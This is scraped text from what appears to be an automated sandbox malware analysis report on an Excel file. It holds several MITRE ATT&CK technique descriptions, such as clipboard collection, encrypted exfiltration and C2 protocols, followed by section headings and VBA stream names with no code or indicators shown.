Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the Windows clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Data is encrypted before being exfiltrated in order to hide the information that is being exfiltrated from detection or to make the exfiltration less conspicuous upon inspection by a defender. The encryption is performed by a utility, programming library, or custom algorithm on the data itself and is considered separate from any encryption performed by the command and control or file transfer protocol. Common file archive formats that can encrypt files are RAR and zip.
Tactics:	Exfiltration
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Use of a standard non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive. (Citation: Wikipedia OSI) Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a common, standardized application layer protocol such as HTTP, HTTPS, SMTP, or DNS to avoid detection by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 20310_011_11353_0_88.xls

Overview

General Information

Detection

Confidence

Classification

Analysis Advice

Mitre Att&ck Matrix

Signature Overview

AV Detection:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Behavior Graph

Simulations

Behavior and APIs

Antivirus Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Yara Overview

Initial Sample

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Joe Sandbox View / Context

IPs

Domains

ASN

Dropped Files

Screenshots

Thumbnails

Startup

Created / dropped Files

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

Contacted IPs

Public

Static File Info

General

File Icon

Static OLE Info

General

OLE File "20310_011_11353_0_88.xls"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: Sheet1.cls, Stream Size: 977

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet2.cls, Stream Size: 977

General

VBA Code Keywords

VBA Code

VBA File Name: Sheet3.cls, Stream Size: 977

General

VBA Code Keywords

VBA Code

VBA File Name: ThisWorkbook.cls, Stream Size: 19217